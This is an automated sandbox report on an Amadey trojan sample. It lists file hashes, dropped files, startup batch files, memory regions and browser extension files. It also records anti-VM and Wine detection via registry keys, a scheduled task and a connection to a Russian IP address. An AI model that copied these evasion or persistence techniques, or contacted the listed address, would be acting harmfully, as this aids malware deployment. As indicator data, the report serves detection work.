SHA512 7df62adbecb10d5894741e85ee99df64949eb8a8300e352a5e9d8253b65ea58971f10d10a1f7a8dc0b99bfc87ab8ee511499a6b740cc996f8ec64e312209d02a

memory/4252-273-0x0000000000360000-0x00000000003CA000-memory.dmp

memory/4252-274-0x00000000055D0000-0x000000000566C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{ABBC6F7A-4BD0-44e4-B37C-8D2FC454366C}.tmp\360P2SP.dll

MD5 fc1796add9491ee757e74e65cedd6ae7
SHA1 603e87ab8cb45f62ecc7a9ef52d5dedd261ea812
SHA256 bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60
SHA512 8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d

C:\Users\Admin\AppData\Local\Temp\[email protected]

MD5 184a117024f3789681894c67b36ce990
SHA1 c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e
SHA256 b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e
SHA512 354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini

MD5 e6edb41c03bce3f822020878bde4e246
SHA1 03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9
SHA256 9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454
SHA512 2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

C:\Users\Admin\Pictures\H0UVbMblodCc40gmvFoORgyt.exe

MD5 acadbe83c09a7a9b8213a662eda12e93
SHA1 26a6e55076bc0602ff9060ac529528f3fc631986
SHA256 42dd6aeee394e298646701ebe1fd611186ea4ee8c7e6383913db121444635944
SHA512 a7ad3777e4a5ae9dd8dd09cff3a3ab498c6d2dc5b922407c48936225cb0c91430f75114f46b0a7b39046dc45c26221e199d33ff0bce105e05e903eef7fbdcd9f

memory/4252-323-0x0000000008220000-0x00000000084E2000-memory.dmp

memory/5024-324-0x000001E433680000-0x000001E4342D2000-memory.dmp

memory/4252-325-0x0000000001330000-0x0000000001336000-memory.dmp

memory/1392-330-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/4252-331-0x0000000008810000-0x000000000882A000-memory.dmp

memory/4252-332-0x0000000008830000-0x0000000008836000-memory.dmp

memory/1392-333-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-334-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-335-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-336-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-337-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-347-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/4988-352-0x0000000000910000-0x0000000000DB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1717037821_00000000_base\360base.dll

MD5 b192f34d99421dc3207f2328ffe62bd0
SHA1 e4bbbba20d05515678922371ea787b39f064cd2c
SHA256 58f13d919f44d194827b609b6b267246abc47134bb202472c0dfe033b9d7ed73
SHA512 00d4c7a0a0097eb4b31a71a0eaf6ff0d44619f77a335c75688565e34e6d7f4fb6c258917457d560c6b0a5077603845ce012e01d9862e87fb5327d7f8da970f95

memory/4988-374-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/1392-379-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/3764-381-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-380-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1392-382-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/3764-398-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-408-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-406-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-404-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-390-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-388-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-386-0x0000000000400000-0x000000000045C000-memory.dmp

memory/3764-384-0x0000000000400000-0x000000000045C000-memory.dmp

C:\Windows\System32\drivers\360FsFlt.sys

MD5 b372e31c719a47b08fe4d377d5df4bde
SHA1 ea936fa64b8d11fa41825f07c2ceeb886804956c
SHA256 8d21a430b38d74157f5d73f8dfd4d508c2fff7f2945fa2987794f656b3acb58c
SHA512 fc2962127bb84aff61239fefc060c002edb6560e11a5e7d2d0dd6d15a431200eb5ac988867988ddd84fd5da241f6bc4a1319ffa83cc9ce7d5691e7e5c4170625

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\90k57km6dgCoPYO3YD7Tth99.bat

MD5 b00ca844589e70d49175eb3340268c43
SHA1 a64dd1e88eff4e7554bd713930d3376eab6083b3
SHA256 adcfe43acb556abcc3538aec825f0fa64fc5cbbd8e86429591224cc430d5974c
SHA512 e7f6496927d03094952dbaaf04a16e3efb8c0eac325093c5ec9beba44c4c4b1f93d7f9cef1b55561b0670b057d78b807acc7e76d3462f6d8b72e984b63db0b53

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\W3RHf5IDlauw2xLLEFu6nXpk.bat

MD5 127f8c2ff599105d7c79d6dc9ef0d264
SHA1 4ab19e2ce80053b0ec86c5173fd41e04d1cb3b3d
SHA256 c13da582f5037c4c1ee7a7f36eba0876999a4606a0975ac732063572beb09d01
SHA512 ac9675c866b4f15f41d47fd86910c0e194f24e8721a320c934533b614f817fada07f4030f568d59442de165072a6cd264ad43c75a51ebfe320f1701c21eb19a6

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uz12620uwxZn724uCMM9FgMO.bat

MD5 397b65ac63811e9956ea073e354cb789
SHA1 e37252697325afaf53d847cd8f558ed0d5155f0f
SHA256 9a9afcbd7c5d115df3db1ad7693aee08173dd1d4e44c07227c91d4503bc42590
SHA512 285d1e5e9c67ff892a103a28db3e0559f195ccc62856e6e0487631f5aba3500f931a2f164475cd95d6ae61079389eb64c57d7ba31a3825d9297718294dfee96d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CUPKdmqFz1ooxBrPhSDvJjzn.bat

MD5 50a28132f432bc8aed84c175cbbd8a19
SHA1 eac93034192bc9fd179228af228dc4edba47dc44
SHA256 049b3dd595f1b087414e75bffb86d48eb435e120001a075842e5d7fe8e69d0dc
SHA512 2411977b6e2bd65fa3150ae023be31a73e92a02c51a890b30971d9cb08c0fa80177ead4387cad33bb8e3c251b27ed708e60b7922c528794299cb8423a0d71a9d

C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg

MD5 4c6845ee34c9625fa970ce1e8b97c819
SHA1 fd73546e3771a86872aa0500114a0d90fbf541ab
SHA256 cdf42b98169bdaca17baa93b2a0ecd85b30b1b4e617a1161d7a8fdd16bbede7e
SHA512 e53632115613f28509bb02980f5cc2bde89b4401b6cb0041a037c49f1979b51a12f1263b4ff8ac897305b0aef3bfcbfbf344f53c2a34ed3921726a4535557e33

C:\Program Files (x86)\360\Total Security\deepscan\netconf.dat

MD5 6cf08213a293f328905c6e57676fe5ac
SHA1 a4c7b339f54b5b2aa76d0ef51a1e107a1552bfc9
SHA256 6ed1d27a14753f014ee2795816aeb2b39ea8dcbbfef0fcffbfea23840aaa7782
SHA512 9ff64d9a64464cdea8ded43e5538ab94688dc2859241165603173689243231e14055b1ac94cb1a82bc9d472aac91a814d189ddcc34a958eed143a8b7737cedb5

C:\Program Files (x86)\360\Total Security\safemon\routertp.ini

MD5 ecf50fa7bbdc571d09148864aa79421a
SHA1 cdd091720ea99e33f9383da1d6a97bd9ca5c6e20
SHA256 c07a3ffe5e7842f2ae9d6082c91cd8f07b838f281071ea400f3494e26392c435
SHA512 98a072344a0a925188957758fd46dc997bb124be88aec50aab8fd86b29857728043e17e772003e506fc4290387b7933c7f09015178807f191e79865d7081ffba

C:\Program Files (x86)\360\Total Security\safemon\netconfig.dat

MD5 777ff6adde1691c29fa51c86af9a34ee
SHA1 88fd4f2f882608a2c82570e7ccc2de27cbeedf23
SHA256 81227c030e55c82ca1c8c106aaae64317b4ab5f12a2167baed5c30db1855f35e
SHA512 9798fbd2b15abb384b5143517f220b3290d904028fff28774aa5e740514824ee56369bc230438d8c87235deb74e0857fdfaf9bb6a37e7e5e8b0914c6101eadc6

memory/1392-578-0x0000000000910000-0x0000000000DB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ADVPACK.DLL

MD5 e98ce891b708859e0ced9d2a0ef5a24b
SHA1 76bedd4599ceb80f8289b1a7ac4f43a0f0ede87d
SHA256 7735dfb067c97033031d45593c320d1229f3acba896c1a4e815a2d1bfd786b11
SHA512 11c6ec18bf8ba8e2b8f4afaa442664c1c89b8026bb1bdba68391f380c0d3a8d35afc3f1a34ffc3643833e28437737dde2c80d3e185ac74c0dba42b54fe53c616

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rootsupd.inf

MD5 62e9fa5b395a827324a21052727f547e
SHA1 1af0fad2790531b8287eb5b1db5b8ddafb6d3571
SHA256 94fe83c96d71ca4e80b7426af32c7e02b784d6492b7b16405114b04f4ffc5464
SHA512 48a93e55e91cde8125714d45fc98180fe7127ef6ce7433ab43d4c09b0d4cea1543f941876e393bf99eac0dcdfae5106821acec86c86babfeaeb0a2f4711a55f3

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\authroots.sst

MD5 b644618f556bd03f7814d2e601add3aa
SHA1 34ae3c398f0f193251ac611094a179eec0582696
SHA256 c2253ee4956864d38a6d85eb64470538950d3d25a6cdc9557b29482066e0cc46
SHA512 88f7be27cc1456dcc8354f455ef7c4c34d7e82cc9a38ec642d89d6d6c27abed80d7feb159dd96735b1b6674edcb642d8c3998b598775f90f02906db1610888e8

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

MD5 9c18ae971cbffb096952177f6804ea31
SHA1 bb255dd1bd9bb39cdbb8671af66054432c686828
SHA256 2703c25453b09c40ee81fdc458b8cc24712e387a12d15ff94e12b02921fe98cb
SHA512 21086509bb4ea5afede55d034955de0bdf8b366d5d8d4bfa7a6c68b0f35fbf217ff3e932f87fc1d37f09022805e79ceeecbaf3dbccbd96d7c93029ffe7370e4c

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.sst

MD5 81054e546a4d39396197048cdccbc295
SHA1 e97c1a03bce9135cc1c0b7d0022b572998f4fdb1
SHA256 a082b21d51a250eb8ee28825f4c7bd274a6078c0908d9af5c8e5c393715346b4
SHA512 654db218aefc769a2f69f5cc0022e18df0c2ca2b0b356cebe09b2b8cd8e57f2041101e0aa0b9225aa5c38bf1532e6611bef6b7ed02f169d54448055415cc44d4

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\roots.sst

MD5 8f5456ab98435524296b4dc4c4f82085
SHA1 26a71432ba446dd4c4d9c49dabe67ed7d31ee68a
SHA256 f66076a44618b4c21abedd1c792c79f7b3b11bc953a77d182aa3c821ff2d4a27
SHA512 0b39a1923308e17963ad5a367055782e1c9412487c443d177ec1b8cfed3716d04ed6afdf72a606b2844bb4baf159d526e2444ffa92ef63643bd9c21dfc57eac1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\delroots.sst

MD5 b190f095991ed6bda489ef38f69c25cb
SHA1 b8edd67d31b4a73ecf2a09233b72aa38c7b14247
SHA256 89e2b2b4daf76b8758c1313b91028e7a58340978df7442d4003849c4d6210c80
SHA512 a740dcf33db0cb77e49fe7964ede41a909728b57a543f3ad419ac822c1994837850a4f20bd7ea7a678d236dc2650ab23961bd264a41653805bbcc966a0e5e4ba

C:\Users\Admin\Pictures\wD2dhV3FhycNZg6ppID8rOZD.exe

MD5 08063da816c5db77ce64807c4ec2f7e8
SHA1 61ded712f36458ba6ffcec37edbf65d5927d2d92
SHA256 dd08b1356c9b9bffe1ae9c254d28411890204e5b8fe1f9b9af0a7a3e5b6ed61e
SHA512 df74cef767efde4711af6e40ef82801d91c4f1b5805fb0411235272a62fd08204d39153d4ae2056880d9d3ceaaae9c8e87254ea57d35a83bf501ac5be721c5f0

C:\Users\Admin\AppData\Local\Temp\7zSB35D.tmp\Install.exe

MD5 7d1dd60c4b8fb4167645f7093801b6d9
SHA1 4ae1feb130e57f803ef00709419e6226b7c0e54d
SHA256 1c62508e00e567d8f753734590a0a303acad2877681173cb4eed2e1a8409f3e9
SHA512 7904bcaefe3d2f0e643f24a2e1eb6f0079e28d7df15f7be0fcd73ecc76680a9a677fe199d8a4d80d08144adbd4769d2a14eac2f933404aeeec05fe103429e872

C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe

MD5 0550ef6afda33ea1c1a231b939ca9b07
SHA1 f74897166553b218e3a0869502ed036f175be9cd
SHA256 8462d8b0433559e9afc2cd5de7bffe38fc6b82e3da9e79bdd33a85ab79fafaeb
SHA512 329fa4ba439852740683dfb60070116fc459785d8a936e59aa4e55affe4697d66c5db844d154b30ab41913342fd5d51760f329cf30dc039387d0929026219a2e

C:\ProgramData\360TotalSecurity\Logs\Administrators\netmon\netconn_s.dat

MD5 4bd814cc818656e523acfedc7613ba72
SHA1 bbd1c990581970b887999c751022dffca08667fb
SHA256 d1d3a33d3eaaaab5224584a318bad58f348c40f95bf1b04c0b61711030c8098d
SHA512 127deb85d1b3d52bd927f352bc843c92c8d54e5e210890263441c9f70db1499b83c6841b375302381431ebbd6e37e62d011000fcceda3bf87346fdf70370490c

memory/6012-655-0x0000000002860000-0x0000000002896000-memory.dmp

memory/6012-656-0x00000000054D0000-0x0000000005AF8000-memory.dmp

memory/6012-657-0x00000000053E0000-0x0000000005402000-memory.dmp

memory/6012-663-0x0000000005B00000-0x0000000005B66000-memory.dmp

memory/6012-668-0x0000000005CE0000-0x0000000006034000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/6012-670-0x0000000006390000-0x00000000063AE000-memory.dmp

memory/6012-673-0x00000000072F0000-0x0000000007312000-memory.dmp

memory/6012-672-0x00000000068C0000-0x00000000068DA000-memory.dmp

memory/6012-671-0x0000000007390000-0x0000000007426000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 5315900105942deb090a358a315b06fe
SHA1 22fe5d2e1617c31afbafb91c117508d41ef0ce44
SHA256 e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7
SHA512 77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f68c28f279faa46eacda72d80b395170
SHA1 8f8292dc1659d25a4310b26d61c3be67f990ac51
SHA256 b9655b8e1b327f4e2bc1fe06336768832242a2fb702f790bad1a36d28e638702
SHA512 63272f4b4e859d1e7446cc711e740823a801b0765e58b652dc11b0aa512cb7e6b3e9b33e1b2c6a7cf1e6c079d60ca8de0cc5d99357ded51522ae55e1957a013e

C:\Windows\ELAMBKUP\360elam64.sys

MD5 67e72ee5dcd6e2c69d9c1f457fd0e3c9
SHA1 1da65ca2fd47f10ec7eac55fdb5bfce19bb90de3
SHA256 7f3f8cde5989c7339f4862dd44ecd827fbf06d0ae6152c17907e27e822e0bf82
SHA512 d715cc1761a025e0df4296a4c37c4e799c6006dce6bf63215f9864cf853cc5f7917fd24baa1cac775e8b74005eebb6fc42b211876bf386af0062364c6ee2fd77

memory/3728-693-0x0000000007820000-0x00000000079E2000-memory.dmp

memory/3728-694-0x00000000091E0000-0x000000000970C000-memory.dmp

C:\Users\Admin\Pictures\DXQAsBMaYFTb6I0ZaoIOBg0a.exe

MD5 f30ed33de1f6dc4e2b9af5e9f36f92db
SHA1 aa1ae28162e4cbdccdd4c16cc9e2f9f7ed329425
SHA256 fa23ddba802b7c002f26ca21051b81af77f14ef0363d71dc5a1aad688dadbaf3
SHA512 16384ead55054170b9a1403122e35c32a0013f241542055305047cb91819a57c4533dcc95e0e6c9eca3653e8ddd81b40d6babad39107d0a64c95f1244822556b

memory/8-733-0x0000000004A50000-0x0000000004DA4000-memory.dmp

memory/8-743-0x0000000005390000-0x00000000053DC000-memory.dmp

memory/4876-758-0x00000000045E0000-0x0000000004934000-memory.dmp

memory/3184-783-0x0000000000400000-0x000000000046E000-memory.dmp

memory/5572-786-0x0000000000910000-0x0000000000DB9000-memory.dmp

memory/3184-787-0x0000000008670000-0x00000000086BC000-memory.dmp

memory/5572-793-0x0000000000910000-0x0000000000DB9000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\favicon.png

MD5 1603865df23efcd1dc421a48f090b2d5
SHA1 29c835478c413295787656da1201a3bd08582267
SHA256 fc48da13fe7501b9a08daced7a7fadc6914a36c6c12461a73d2170d748be5712
SHA512 e9bca0319aa1cacdd86a3b5b5904cd508a245e64399acf335299b298feec130985b68ad3456b177aa466284c6239e952aa15ed0e6545ae6ad72848d3ea6405b1

memory/5024-796-0x000001E44E900000-0x000001E44E912000-memory.dmp

memory/5024-797-0x000001E44E7D0000-0x000001E44E7DA000-memory.dmp

memory/4824-826-0x0000000004390000-0x00000000046E4000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 686480f6d1c79d8c9062f99eedea28cc
SHA1 1ee0e9afcdc9d50d18f8e41688f06cdf377d0d69
SHA256 35b2f53c4f3ea6bc74803cfcc5154a4e1348000bc60f347a396bb90409e8d733
SHA512 eb422eb2f8772bb161fc5bf7b1953cf61de91b4dec7a5817e493907ceedcecb8b93d64eb7b055aa618703534f5a8ed51b33a29b7f5fe36e480971785daadd1de

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\prefs.js

MD5 7487bc925ae29454214367e79c0db560
SHA1 39d0983adde1044d204e34fa177f2d73edb55873
SHA256 efcc99c59963478c7ff9ded7f07d08d5d174ded0bab326b4c57295658a412513
SHA512 67093bf14a527d7cf3ff25b0386b3d6ed2347413cadf775eff1e85995e6b5854be899591f89300b19fd9f97e6fb539d359d19e02905c173195bdd4b10c0fd923

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 eebb1d01ca366506fcbbba6db62ffb73
SHA1 0bffdbadfb80740cab088f887a183b6fe043c9ec
SHA256 84f527c10f34a693321974763ec278821716170b940b9269d9130d0d9cfa5fd8
SHA512 12178920e09b2fadf762a7686a7dee497ab9fac52898a33eccdf8b436fd863ba6972652b3c8a64eb302ffa655340f4e0a1d851890692e1bc3ef506f3388860b5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 4d39c3c170cac6b614bc480af0e9d7c4
SHA1 73c817d78a2cf644e066059011dc038f358f36d2
SHA256 4cd2e07e72d0d301d99d8fbd4b7c283027417d0cf05471dcf01a0244a4a5e044
SHA512 756d20538f32cb6bb7717840f7dbe8565859c22af7e7b784819ffc14ca8a5aad02fb0fab7f3fce3600466c48f817a1ab59c6dde4f42e9de3901af2320771908f

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-30 02:56

Reported

2024-05-30 02:58

Platform

win11-20240426-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplont.job C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe

"C:\Users\Admin\AppData\Local\Temp\cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

Network

Country Destination Domain Proto
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp

Files

memory/3664-0-0x00000000007C0000-0x0000000000C69000-memory.dmp

memory/3664-1-0x0000000076ED6000-0x0000000076ED8000-memory.dmp

memory/3664-2-0x00000000007C1000-0x00000000007EF000-memory.dmp

memory/3664-3-0x00000000007C0000-0x0000000000C69000-memory.dmp

memory/3664-5-0x00000000007C0000-0x0000000000C69000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

MD5 a49d4ea8ceef49682b23f1308f5fce4b
SHA1 eed6afea70bb6655a8d1289ad072a186ee3ed1de
SHA256 cb560c505ccc4c84a4289a5101821494603febad6b1b665ae74fe9d41fee35dc
SHA512 1efda3277e81e247645e48cd7cd0537d345cbff187bda289655e60d040d25d529f9f33988d2108321de6b0a387c254b989457a4bf30a1408a3ec162ac6ebdc70

memory/3664-16-0x00000000007C0000-0x0000000000C69000-memory.dmp

memory/720-18-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-19-0x0000000000E41000-0x0000000000E6F000-memory.dmp

memory/720-20-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-21-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-22-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-23-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-24-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-25-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-26-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-27-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-28-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/2724-30-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/2724-31-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/2724-32-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/2724-34-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-35-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-36-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-37-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-38-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-39-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-40-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/4496-42-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/4496-44-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-45-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-46-0x0000000000E40000-0x00000000012E9000-memory.dmp

memory/720-47-0x0000000000E40000-0x00000000012E9000-memory.dmp